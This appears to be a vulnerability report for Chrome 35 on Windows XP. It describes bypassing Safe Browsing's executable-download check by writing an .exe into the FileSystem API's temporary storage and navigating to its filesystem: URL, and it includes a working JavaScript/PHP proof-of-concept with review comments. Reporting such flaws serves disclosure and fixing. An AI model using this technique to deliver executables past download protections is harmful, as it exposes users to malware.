VULNERABILITY DETAILS
Safe Browsing's check for executable file downloads can be bypassed with the FileSystem API: the page creates the .exe file to be downloaded in a temporary filesystem and then navigates to it. In this test case a server-side PHP script builds the JavaScript byte array, but other techniques could be used here (e.g. an XMLHttpRequest returning a Blob).
You must not be in Incognito mode for this to work.
VERSION
Chrome Version: 35.0.1916.114 m + stable
Operating System: Windows XP Home Edition Service Pack 3
REPRODUCTION CASE
Test case available at https://server2.vittgam.net/testerone123/exedlvuln/vuln.php
<script>
// Reproduction case for the report above. The script writes a payload into the
// origin's TEMPORARY sandboxed filesystem and then navigates the page to the
// URL of the stored entry. Per the report, a download started this way is not
// covered by the Safe Browsing check for executable files.
// This file is a server-rendered template: the inline PHP expression in the
// Blob constructor below is expanded before the browser receives the script.
(function(){
// Shared error callback for every FileSystem API call below; it only logs.
var errorize=function(e){console.log(e);};
// Name of the entry created in the temporary filesystem (the .exe from the report).
var filename='msghello-bypass.exe';
// The inline PHP reads msghello.exe on the server, maps each byte to its ordinal
// value and emits the list as a JSON array (str_replace only adds a space after
// each comma). The browser wraps those bytes in a Uint8Array and then in a Blob
// typed application/octet-stream.
var blob=new Blob([new Uint8Array(<?php echo str_replace(',',', ',json_encode(array_map('ord',str_split(file_get_contents('msghello.exe'))))); ?>)],{type:'application/octet-stream'});
// Request a TEMPORARY filesystem with a requested size of 1048576 bytes (1 MiB).
// NOTE(review): the report states this does not work in Incognito mode.
window.webkitRequestFileSystem(window.TEMPORARY,1048576,function(fs){
// Creates the entry, writes the blob into it, then navigates to it.
var createFile=function(){
// exclusive:true makes getFile fail if the entry already exists, which is why
// the lookup-and-remove step further down runs before createFile.
fs.root.getFile(filename,{create:true,exclusive:true},function(fileEntry){
fileEntry.createWriter(function(writer){
// Handlers are attached before write() is called so the completion event is not missed.
writer.onwriteend=function(){
// toURL() returns a filesystem: URL for the stored entry; assigning it to
// location.href navigates the top-level page to that URL.
// NOTE(review): this navigation is the step the report describes as bypassing
// the executable-file check. A regression test for the fix should confirm that
// a download started from a filesystem: URL receives the same Safe Browsing
// verdict as the same bytes fetched over the network.
window.location.href=fileEntry.toURL();
};
writer.onerror=errorize;
writer.write(blob);
},errorize);
},errorize);
};
// Look the entry up without creating it. If it exists, remove it and then call
// createFile; if the lookup fails for any reason, createFile is used as the
// error callback and runs directly (the error argument it receives is ignored).
fs.root.getFile(filename,{create:false},function(fileEntry){
fileEntry.remove(createFile,errorize);
},createFile);
},errorize);
})();
</script>